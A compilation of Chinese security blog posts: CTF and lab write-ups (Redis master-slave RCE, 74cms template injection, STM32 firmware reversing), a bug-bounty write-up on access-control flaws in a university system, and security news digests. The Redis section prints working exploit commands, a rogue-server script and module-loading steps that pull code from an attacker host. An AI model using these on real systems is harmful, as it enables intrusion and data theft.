记录一下中途短暂的辉煌时刻 　  辉煌一刻谁都有,别拿一刻当永久 　　 　　在昨天初尝战果之后，今天又习惯性的打开 https://vulfocus.cn/ 发现今天还有挑战赛，按捺不住躁动的心，又开始了学习。今天主要拿下的是这四个镜像，同时我也会对我了解的漏洞详情做一个具体的分析 　　 weblogci CVE_2020_2551 　　我们看到了对应的端口有 7001 　　 　　看到熟悉的界面以及之前察觉的端口信息，感觉有可能是 weblogic ，加上路径 console 查看一下，是 weblogic 10.3.6.0 　　weblogic 存在的漏洞太多了，所以我们直接上漏洞扫描工具 　 　　看到了漏洞对应的编号，以及存在的回显链路 phpinfo 信息泄露 　　打开界面就是一个 phpinfo 　　尝试了扫路径，查 phpinfo 漏洞的操作无果后，于是直接在页面上查找关键词 flag 　 　　轻易就查询到了 flag 的值，这个题目给 5 分 我是没有想到的 Redis 未授权访问漏洞 　　一看对应映射的端口是 6379 立马就联想到了 Redis，同时这个端口无法从 web 端进行访问，所以基本可以肯定是 Redis 了 　　注意到版本是 4.0.14 　　针对于 Redis 未授权访问漏洞，有以下利用方法 利用 Redis 写入webshell 写 ssh-keygen 公钥登录服务器 利用计划任务反弹shell 利用主从复制获取shell 　　这里我们选用 主从复制漏洞来获取shell 　　在服务器上操作(今天借到了服务器) git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git cd RedisModules-ExecuteCommand/ make # 生成 /RedisModules-ExecuteCommand/src/module.so cd .. git clone https://github.com/Ridter/redis-rce.git cd redis-rce/ cp ../RedisModules-ExecuteCommand/src/module.so ./ pip install -r requirements.txt python redis-rce.py  -r 123.58.236.76 -p 57119 -L 43.142.138.251 -f module.so 　　 　　 利用主从复制获取shell 　　Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中，当读写体量比较大的时候，服务端就很难承受。为了应对这种情况，Redis就提供了主从模式，主从模式就是指使用一个redis实例作为主机，其他实例都作为备份机，其中主机和从机数据相同，而从机只负责读，主机只负责写，通过读写分离可以大幅度减轻流量的压力，算是一种通过牺牲空间来换取效率的缓解方式。 　　在Reids 4.x之后，Redis新增了模块功能，通过外部拓展，可以实现在Redis中实现一个新的Redis命令，通过写C语言编译并加载恶意的.so文件，达到代码执行的目的。 Linux 　　在本机上弄的时候出现各种各样的奇葩的问题，给我整破防了，最后我采用了 docker 来进行复现。复现不同的利用都删掉 docker ，重启继续进行。最后发现主从复制的利用版本是 4.x-5.x，从 6.0开始,就无法利用成功，写入exp.so 也是可以的，module 加载时会失败，提示没有权限，给 exp.so 权限后时可以的。 sudo docker pull vertigo/redis4 sudo docker run -p 6379:6379 vertigo/redis4 redis-rce 　　https://github.com/Ridter/redis-rce 　　生成恶意.so文件，下载RedisModules-ExecuteCommand使用make编译即可生成 git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git cd RedisModules-ExecuteCommand/ make # 生成 /RedisModules-ExecuteCommand/src/module.so cd .. git clone https://github.com/Ridter/redis-rce.git cd redis-rce/ cp ../RedisModules-ExecuteCommand/src/module.so ./ pip install -r requirements.txt python redis-rce.py -r 192.168.10.187 -p 6379 -L 192.168.10.1 -f module.so redis-rogue-server 　　https://github.com/n0b0dyCN/redis-rogue-server git clone https://github.com/n0b0dyCN/redis-rogue-server.git cd redis-rogue-serve python3 redis-rogue-server.py --rhost 192.168.10.187 --lhost 192.168.10.1 Redis主从复制手动挡 import socket from time import sleep from optparse import OptionParser def RogueServer(lport):    resp = ""    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.bind(("0.0.0.0",lport))    sock.listen(10)    conn,address = sock.accept()      sleep(5)    while True:        data = conn.recv(1024)        if "PING" in data:            resp="+PONG"+CLRF            conn.send(resp)        elif "REPLCONF" in data:            resp="+OK"+CLRF            conn.send(resp)        elif "PSYNC" in data or "SYNC" in data:            resp =  "+FULLRESYNC " + "Z"*40 + " 1" + CLRF            resp += "quot; + str(len(payload)) + CLRF            resp = resp.encode()            resp += payload + CLRF.encode()            if type(resp) != bytes:                resp =resp.encode()                  conn.send(resp)        #elif "exit" in data:            break if __name__=="__main__":    parser = OptionParser()                    parser.add_option("--lport", dest="lp", type="int",help="rogue server listen port, default 21000", default=21000,metavar="LOCAL_PORT")        parser.add_option("-f","--exp", dest="exp", type="string",help="Redis Module to load, default exp.so", default="exp.so",metavar="EXP_FILE")         (options , args )= parser.parse_args()    lport = options.lp    exp_filename = options.exp    CLRF="\r\n"    payload=open(exp_filename,"rb").read()    print "Start listing on port: %s" %lport    print "Load the payload:   %s" %exp_filename      RogueServer(lport) redis-cli -h 192.168.10.187 > ping > config set dir ./               # 设置redis的备份路径为当前目录 > config set dbfilename exp.so    # 设置备份文件名为exp.so，默认为dump.rdb > slaveof 192.168.10.1 9999       # 设置主服务器IP和端口 > module load ./exp.so            # 加载恶意模块 > slaveof no one                  # 切断主从，关闭复制功能 > system.exec 'whoami'            # 执行系统命令 > config set dbfilename dump.rdb  # 通过dump.rdb文件恢复数据 > system.exec 'rm ./exp.so'       # 删除exp.so > module unload system            # 卸载system模块的加载 　　 windows 　　Redis 官方没有提供 windows 版的安装包，windows 下使用的 Redis 还是 3.X 版本的。 redis 在写文件的时候会有一些版本信息以及脏数据，无法写出正常的DLL、EXE、LINK 等文件，所以 对 Windows 下的 redis 的利用方法主要是往 web 目录写马以及写启动项。 RedisWriteFile 　　https://github.com/r35tart/RedisWriteFile 利用Redis的主从同步写数据，脚本将自己模拟为master，设置对端为slave， master 数据空间保证绝对干净，轻松实现了写无损文件。 　　参考文章 http://r3start.net/index.php/2020/05/25/717 https://xz.aliyun.com/t/7940可以利用以下方式 系统 DLL劫持 （目标重启或注销） 针对特定软件的 DLL 劫持（目标一次点击） 覆写目标的快捷方式 （目标一次点击） 覆写特定软件的配置文件达到提权目的 （目标无需点击或一次点击） 覆写 sethc.exe 等文件 （攻击方一次触发） mof 等 　　因为对这些暂时还没有研究，所以在这里只演示以下，在 windows redis 写无损文件 python RedisWriteFile.py --rhost=[target_ip] --rport=[target_redis_port] --lhost=[evil_master_host] --lport=[random] --rpath="[path_to_write]" --rfile="[filename]" --lfile=[filename] python3 RedisWriteFile.py --rhost=192.168.10.190 --rport=6379 --lhost=192.168.10.1  --lport=9999 --rpath="C:\Users\Public" --rfile="test.txt"  --lfile="test.txt" 　　哇，这个无损写文件真是 yyds，在 linux 下利用也是没有一点问题。 　　 骑士cms 存在模板解析漏洞 　　打开页面就是 骑士cms，想到了骑士 cms 的历史漏洞 文件包含漏洞(thinkphp3 的文件包含) 　　这样操作 http://74cms.test/index.php?m=home&c=index&a=assign_resume_tpl POST: variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/> http://74cms.test/index.php?m=home&c=index&a=assign_resume_tpl POST: variable=1&tpl=data/Runtime/Logs/Home/22_06_28.log 　　 　 　　 　　漏洞的原理主要是通过将代码通过报错信息写到日志文件中，再利用文件包含实现代码执行。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、用 Rust 编写的Hive勒索软件变种出现 https://www.securityweek.com/evasive-rust-coded-hive-ransomware-variant-emerges 2、万豪国际遭遇新的数据泄露，攻击者窃取了 20GB 数据 https://securityaffairs.co/wordpress/132943/data-breach/marriott-new-data-breach.html 3、OpenSSL 为可能导致 RCE 攻击的高危漏洞发布补丁 https://thehackernews.com/2022/07/openssl-releases-patch-for-high.html 4、NIST 宣布前四种抗量子攻击的密码算法 https://thehackernews.com/2022/07/nist-announces-first-four-quantum.html 5、新的 RedAlert 勒索软件针对 Windows、Linux VMware ESXi 服务器 https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/ 6、网络钓鱼诈骗冒充阿联酋政府人力资源部针对中东 https://www.cloudsek.com/threatintelligence/advanced-phishing-scams-target-individuals-businesses-in-the-middle-east/ 7、Spring Data MongoDB修复一个严重的SpEL注入漏洞 https://portswigger.net/daily-swig/spring-data-mongodb-hit-by-another-critical-spel-injection-flaw 8、卡巴斯基推出针对手机跟踪软件检测的免费工具 https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/ 9、PCI DSS 4.0发布以应对新兴威胁和技术 https://www.helpnetsecurity.com/2022/07/05/pci-dss-4-0-released/ 10、调查显示传统数据安全工具面对勒索软件攻击的失败率高达 60% https://www.ithome.com/0/627/965.htm

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、大规模的网络攻击袭击了特拉维夫地铁IT设施 https://securityaffairs.co/wordpress/132897/hacking/tel-aviv-metro-company-attacked.html2、AstraLocker 勒索软件关闭了其运营并放出了解密器 https://securityaffairs.co/wordpress/132871/malware/astralocker-ransomware-shut-down.html3、研究人员发现恶意 NPM 包从应用程序和 Web 表单中窃取数据 https://thehackernews.com/2022/07/researchers-uncover-malicious-npm.html4、德国提出应对卫星网络威胁的计划 https://www.theregister.com/2022/07/05/bsi_satellite_baseline/5、Cyber Europe 2022：欧盟完成超大规模网络战争演习 https://portswigger.net/daily-swig/cyber-europe-2022-eu-completes-large-scale-cyber-war-game-exercise6、Talos研究人员分享了揭露暗网上匿名勒索软件网站的技术 https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html7、报告显示2022 年十大高薪紧缺技能：网络安全排名第一 https://www.secrss.com/articles/442958、媒体六问“学习通数据疑泄露”：如何被窃取？平台要担何责? https://www.cnbeta.com/articles/tech/1287461.htm9、招聘网站 51job 个人信息数据库泄露？官方回应称无异常 https://www.secrss.com/articles/4429210、乌克兰核电站遭到物理/网络协同攻击？微软报告遭众多网络专家质疑 https://www.cyberscoop.com/cybersecurity-experts-question-microsofts-ukraine-report/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Chrome 103 发布紧急更新补丁修复了一个被利用的0day漏洞 https://www.securityweek.com/emergency-chrome-103-update-patches-actively-exploited-vulnerability 2、 Django Web 框架修复了高危SQL注入漏洞 https://securityaffairs.co/wordpress/132853/security/django-framework-sql-injection.html 3、CISA 命令联邦机构在 7 月 22 日之前修补 CVE-2022-26925 https://securityaffairs.co/wordpress/132830/security/cisa-orders-patch-cve-2022-26925.html 4、研究人员发现一群未成年人在Discord平台开发、出售恶意软件 https://www.hackread.com/teen-hackers-discord-sell-malware-for-quick-cash/ 5、英国陆军YouTube和Twitter账户遭黑客入侵 https://www.theverge.com/2022/7/3/23193668/british-army-youtube-twitter-accounts-hacked-promote-crypto-scam-fraud 6、钓鱼邮件伪装成加拿大税务机构窃取用户信息 https://www.welivesecurity.com/2022/07/01/phishing-scam-posing-canadian-tax-agency-canada-day/ 7、俄罗斯政府转向 Linux 操作系统 https://www.solidot.org/story?sid=71998 8、企业SaaS软件Zoho某个工具的关键漏洞遭在野利用 https://www.bleepingcomputer.com/news/security/zoho-manageengine-adaudit-plus-bug-gets-public-rce-exploit/ 9、微软更新Azure AD，支持临时密码 https://www.bleepingcomputer.com/news/microsoft/microsoft-updates-azure-ad-with-support-for-temporary-passcodes/ 10、美国网络安全出口管制文件《信息安全控制：网络安全物项》解读 https://www.freebuf.com/articles/neopoints/337315.html

前言 最近edusrc上了新证书，这不得安排他一手。 确定目标 话不说信息收集一手，直接打开fofa,使用语法title="XXX大学"，找到了一个系统 看到登录框，可能大家都会先进行弱口令的爆破，可能是我脸黑，遇到这种我就没有一次能爆破出来的，所以我比较喜欢测试未授权访问，这里我随便输了个账号密码 返回抓取这个接口的返回包，返回包里返回了500 这里我把它改成了两百，能进去系统，但是没有任何的数据信息 然后我直接F12查看源代码，找到了一处路由，/EmployeeManager，将他拼接在网址后面 访问 直接一手未授权访问，中危到手，原本想着提交上去手工了的，但一看证书兑换条件，得两个中危，这不是为难我胖虎吗，没办法就能继续加班，于是我利用了刚才获取到的用户名密码登录 登录进去后有一个个人承诺，需要点了同意才能下一步，让后点击同意进行抓包  接口返回了用户的sf证和密码，接着把EmployeeID=000005 改成000006  又是一个水平越权，泄露了用户敏感信息，中危有应该是稳了，然后我注意到了这个系统是区分管里员和普通用户的，就是一个前端可以选择角色类型进行登录，然后我想到能不能用普通用户的账号密码登录，然后越权到管理员的权限，在登录时进行抓包 拦截这个接口的返回包 把QX改成管理员，然后放包 可以看到已经越权成了管理员的sf  结束 都是很常规的漏洞，最重要的就是细心了。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Google Project Zero 称今年上半年发现的0day有一半是旧漏洞的变种 https://www.securityweek.com/google-half-2022s-zero-days-are-variants-previous-vulnerabilities 2、Jenkins 安全团队披露数十个 Jenkins 插件 0day漏洞 https://securityaffairs.co/wordpress/132836/security/jenkins-plugins-zero-day-flaws.html 3、微软：Windows蠕虫Raspberry Robin 已感染数百个组织的网络 https://securityaffairs.co/wordpress/132826/malware/microsoft-raspberry-robin-spreading.html 4、出版业巨头麦克米伦遭勒索软件攻击，被迫关闭其IT设施 https://securityaffairs.co/wordpress/132792/cyber-crime/macmillan-ransomware-attack.html 5、谷歌改进其密码管理器以提高所有平台的安全性 https://thehackernews.com/2022/07/google-improves-its-password-manager-to.html 6、Gitlab 修补了最新安全版本中的关键 RCE漏洞 https://portswigger.net/daily-swig/gitlab-patches-critical-rce-bug-in-latest-security-release 7、黑客入侵已认证的Twitter帐户以发送虚假通知 https://www.bleepingcomputer.com/news/security/verified-twitter-accounts-hacked-to-send-fake-suspension-notices/ 8、HackerOne披露前员工窃取漏洞报告并出售 https://www.bleepingcomputer.com/news/security/rogue-hackerone-employee-steals-bug-reports-to-sell-on-the-side/ 9、报告称Coinbase向ICE出售用户地理位置数据 https://www.hackread.com/report-coinbase-selling-user-geolocation-data-ice/ 10、超过90万个Kubernetes实例被发现在线暴露 https://www.armosec.io/blog/over-900k-kubernetes-clusters-found-exposed/

固件安全 一、前言 本日学习记录 二、复现 1、SCTF 2020 Password Lock 参考链接：https://xuanxuanblingbling.github.io/iot/2020/07/08/stm32/ 题目描述 这是一个STM32F103C8T6 MCU密码锁它具有4个按键，分别为1, 2, 3, 4. 分别对应GPIO_PA1, GPIO_PA2, GPIO_PA3, GPIO_PA4flag1格式为SCTF{正确的按键密码}输入正确的密码, 它将通过串口(PA9–TX)发送flag2 解题思路 题目附件给出了一个Intel hex文件，并且给出了芯片信息我们可以确定程序的内存布局和外设寄存器与内存的对应。而逆向的关键就是读懂程序代码的含义，接下来我们将逐步分析这个hex文件。 1. hex文件结构 Intel hex文件格式由纯文本构成，其中包含了程序的加载地址和程序入口地址等信息，读懂这些信息可以帮助我们快速定位程序的起始入口而不用在ida中进行配置。 https://www.cnblogs.com/aqing1987/p/4185362.html 我们可以使用文本编辑器打开题目附件，其中关键信息如下所示： :020000040800F2 ... ... :04000005080000ED02 :00000001FF 程序加载地址为0x08000000 程序入口地址为0x080000ED 程序以:00000001FF结尾 其余全是文件数据 2、内存布局 查找芯片手册的网站：https://www.alldatasheet.com/在里面我们可以找到STM32F103C8T6的手册，第一页发现我们需要的一些信息 Flash memory：32-to-128 Kbytes SRAM：6-to-20 Kbytes 31页的Memory Map可以让我们更加直观的了解到内存的详细布局 综上所述我们得到了程序的完整内存布局信息： Flash Memory: 0x8000000 ~ 0x801FFFF (128K) SRAM: 0x20000000 ~ 0x20004FFF (20K) Peripherals: 0x40000000 ~ 0x40023400 3、IDA分析 经过刚才的分析我们了解了程序的内存布局，其中Flash段除了包含代码，还有中断向量表。Periphers段中的寄存器是我们在逆向过程中需要对齐有大体了解。而对于hex文件的分析我们了解到除了加载地址和入口地址，其他的所有内容都不在hex文件中，所以我们需要手动配置这些内存布局信息来告诉IDA怎么识别。 打开ida工具，根据刚才的手册中我们可以查到芯片是arm32 Armv7-M架构，如下图所示进行配置选择然后单击ok 可以看到已经能识别出一部分函数，其中start函数的地址与我们分析hex文件结构时找到的程序入口地址相同。 如果hex文件中没有给出入口地址信息我们也可以通过寻找RESET中断处理函数来确定程序入口函数。其中RESET中断函数的地址可以在https://xuanxuanblingbling.github.io/assets/attachment/stm32/STM32%E4%B8%AD%E6%96%87%E5%8F%82%E8%80%83%E6%89%8B%E5%86%8CV10.pdf中找到相关信息 参考 https://blog.csdn.net/yangzhao0001/article/details/73293379 中我们可以了解到在中断向量表中RESET的地址0x8000004的地址是固定的，而可变的是程序的加载地址。我们跳转到0x8000004这个地址上，按键盘D键将上面的数据分成4字节形式找到reset的地址为0x8000101 跳转到RESET中断处理函数，存在两次跳转。第一次跳转到nullsub_1上并将下一条指令地址放入LR寄存器，nullsub_1函数的作用是跳回LR寄存器中的地址，所以第一跳没有意义。第二次跳转就是我们的start地址，所以完全可以利用此方式定位到程序的入口地址。 一直跟着入口地址走就能找到这个程序的main函数所在，但是进来之后可以发现左边这一大片红色的标记，观察这些红色区域其实就是IDA没有识别的地址，也就是我们之前分析内存布局需要添加的内存段。 我们在IDA中新建Segment，如下图所示： 这时只要我们再次点击F5即可让这些红色的标识变成正常识别的内存了 4、修复中断向量表 使用IDApython恢复程序入口地址之前的信息 for i in range(0x8000000,0x80000eb,1): del_items(i) for i in range(0x8000000,0x80000eb,4): create_dword(i) 修复完成后我们观察这里面的地址，会发现有很多重复的地址0x800016D，跟进去会发现这些地址中没有定义函数功能。继续查看中断向量表会发现下面几个不同的内存地址 参考 https://xuanxuanblingbling.github.io/assets/attachment/stm32/STM32%E4%B8%AD%E6%96%87%E5%8F%82%E8%80%83%E6%89%8B%E5%86%8CV10.pdf中的内容我们可以查找到这些就是EXTI的中断处理函数地址 https://bbs.huaweicloud.com/blogs/326866 跟进这些函数地址会发现IDA并没有将其识别为函数，所以我们先在函数起始地址处按P键，然后进行反汇编即可看到这些中断处理函数，这里我以EXTI_4的中断处理函数为例来简单介绍一下这些中断处理函数的功能。 int EXTI_4() { int result; // r0 EXTI_LINE = 16; switch ( sum ) {   case 1:     unk_20000006 = 116;     return sum++ + 1;   case 2:     unk_20000010 = 95;     return sum++ + 1;   case 4:     unk_2000000E = unk_20000001;     return sum++ + 1;   default:     result = 0;     sum = 0;     break; } return result; } 程序一开始先设置了中断/事件线，EXTI_4的中断/事件线为0x10，然后使用一块内存(这里记作sum)来作为累加数的保存位置。我们可以看到当sum中的值为1、2、4时sum的值会+1，如果不是的话则会重新开始。所以我们可以判断出1、2、4就是EXTI_4出现在密码中的位数，同理其他的三个按钮也是一样的，通过这些顺序我们可以得到最终的flag为flag{1442413}，并且我们可以发现在main函数中程序先模拟输入了一次密码，通过将上面的值与EXTI_LINE进行对应也能得到flag值。 2、2021 HWS 入营赛-STM32 经过了上一题的入门接下来我们再来一道题目练习一下，打开IDA类型选择小段arm32，架构选择ARMv7-M架构。 接下来设置程序的加载地址和读取地址设置为0x8000000，加载地址是指IDA加载的分析地址是多少，而Input File是指固件要从什么位置开始加载，设置好以后我们点击OK完成设置。 进入以后会发现IDA没有识别出任何函数，不用担心我们可以通过定位reset的中断处理来找到main函数的位置。将0x8000004地址处的字节变成4字节，得到reset中断处理函数地址0x8000101。 可以发现地址的结尾是奇数位，在arm中这代表了thumb模式。我们可以在0x8000101地址按下C键即可生成代码 一直跟着程序流走我们就能找到main函数所在位置sub_80003C0，并且在其中发现了需要逆向的函数sub_8000314 _BYTE *sub_8000314() { _BYTE *v0; // r4 char *v1; // r5 int v2; // r6 char v3; // t1 v0 = (_BYTE *)sub_80003F0(48); v1 = &byte_8000344; v2 = 0; while ( v2++ != 0 ) {   v3 = *v1++;   *v0++ = (v3 ^ 0x1E) + 3;   sub_8000124(v1); } return v0; } 写出解题脚本即可获得flag值 li = [0x7D, 0x77, 0x40, 0x7A, 0x66, 0x30, 0x2A, 0x2F, 0x28, 0x40, 0x7E, 0x30, 0x33, 0x34, 0x2C, 0x2E, 0x2B, 0x28, 0x34, 0x30, 0x30, 0x7C, 0x41, 0x34, 0x28, 0x33, 0x7E, 0x30, 0x34, 0x33, 0x33, 0x30, 0x7E, 0x2F, 0x31, 0x2A, 0x41, 0x7F, 0x2F, 0x28, 0x2E, 0x64] print(''.join(chr((i ^ 0x1E) + 3) for i in li))

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Brocade 软件中发现的漏洞影响几家大公司的存储解决方案 https://www.securityweek.com/brocade-vulnerabilities-could-impact-storage-solutions-several-major-companies 2、Lazarus APT被认为是盗取Harmony 1亿美元加密货币的幕后黑手 https://www.securityweek.com/north-korea-lazarus-hackers-blamed-100-million-horizon-bridge-heist 3、韩国网络安全机构发布了 Hive 勒索软件的免费解密器 https://securityaffairs.co/wordpress/132770/malware/hive-ransomware-decryptor.html 4、美国 FCC 专员要求苹果和谷歌从应用商店中下架 TikTok https://thehackernews.com/2022/06/us-fcc-commissioner-asks-apple-and.html 5、XFiles Infostealer 恶意软件利用 Follina 漏洞进行攻击 https://www.bleepingcomputer.com/news/security/xfiles-info-stealing-malware-adds-support-for-follina-delivery/ 6、Chromium 浏览器容易受到悬挂标记注入的影响 https://portswigger.net/daily-swig/chromium-browsers-vulnerable-to-dangling-markup-injection 7、OpenSea 披露数据泄露，警告用户防范网络钓鱼攻击 https://www.bleepingcomputer.com/news/security/opensea-discloses-data-breach-warns-users-of-phishing-attacks/ 8、经报网络安全审查办公室同意，BOSS 直聘、运满满恢复新用户注册 https://www.ithome.com/0/627/030.htm 9、意大利监管机构称谷歌分析工具侵犯隐私 https://www.inforisktoday.com/italian-watchdog-says-google-analytics-privacy-violation-a-19470 10、挪威国家安全局称挪威多家大型组织遭受DDoS攻击 https://therecord.media/norway-accuses-pro-russian-hackers-of-launching-wave-of-ddos-attacks/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Firefox 102 修补 19 个漏洞，改善隐私保护策略 https://www.securityweek.com/firefox-102-patches-19-vulnerabilities-improves-privacy 2、Azure Service Fabric 漏洞可能导致集群接管 https://www.securityweek.com/azure-service-fabric-vulnerability-can-lead-cluster-takeover 3、MITRE 发布 2022 年 25 个最危险漏洞列表 https://www.securityweek.com/mitre-publishes-2022-list-25-most-dangerous-vulnerabilities 4、UnRAR 中的路径遍历漏洞可能允许入侵 Zimbra 邮件服务器 https://securityaffairs.co/wordpress/132737/breaking-news/unrar-path-traversal-flaw-zimbra.html 5、新的 YTStealer 恶意软件劫持 YouTube 内容创作者的帐户 https://thehackernews.com/2022/06/new-ytstealer-malware-aims-to-hijack.html 6、AstraLocker 2.0 利用 Office 文档分发勒索软件 https://blog.reversinglabs.com/blog/smash-and-grab-astralocker-2-pushes-ransomware-direct-from-office-docs 7、FBI 警告网络犯罪分子使用 Deepfakes进行身份冒充申请远程工作 https://www.zdnet.com/article/fbi-warning-crooks-are-are-using-deepfakes-to-apply-for-remote-tech-jobs 8、Evilnum黑客组织把目标对准参与国际移民的欧洲组织 https://www.bleepingcomputer.com/news/security/evilnum-hackers-return-in-new-operation-targeting-migration-orgs/ 9、美国、巴西查获272个用于非法下载音乐的网站 https://www.bleepingcomputer.com/news/security/us-brazil-seize-272-websites-used-to-illegally-download-music/ 10、微软将在 7 月为所有用户修复 Windows RRAS、VPN 问题 https://www.bleepingcomputer.com/news/microsoft/microsoft-will-fix-windows-rras-vpn-issues-for-all-users-in-july/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、CISA 表示"PwnKit"Linux 漏洞(CVE-2021-4034)已在攻击中被利用 https://www.securityweek.com/cisa-says-pwnkit-linux-vulnerability-exploited-attacks2、谷歌宣布全面推出 Cloud Armor Web安全功能 https://www.securityweek.com/google-introduces-new-capabilities-cloud-armor-web-security-service3、最新的 OpenSSL 版本受到远程内存损坏漏洞的影响 https://securityaffairs.co/wordpress/132697/security/openssl-remote-memory-corruption-flaw.html4、西部银行在自动取款机上发现借记卡窃取器 https://www.bleepingcomputer.com/news/security/bank-of-the-west-found-debit-card-stealing-skimmers-on-atms/5、立陶宛政府证实它受到了强烈的网络攻击 https://securityaffairs.co/wordpress/132676/cyber-warfare-2/lithuania-massive-ddos.html6、ZuoRAT 恶意软件劫持家庭和办公室路由器以监视目标网络 https://thehackernews.com/2022/06/zuorat-malware-hijacking-home-office.html7、Messenger 聊天机器人被用于窃取 Facebook 帐户 https://www.bleepingcomputer.com/news/security/messenger-chatbots-now-used-to-steal-facebook-accounts/8、《个人信息跨境处理活动安全认证规范》发布，规范个人信息跨境活动 https://www.freebuf.com/news/337414.html9、RansomHouse勒索组织声称拥有从AMD窃取的450Gb数据 https://www.theregister.com/2022/06/28/amd-ransomhouse-data-extortion/10、国家网信办发布《互联网用户账号信息管理规定》 8月1日起施行 http://www.ce.cn/culture/gd/202206/27/t20220627_37807243.shtml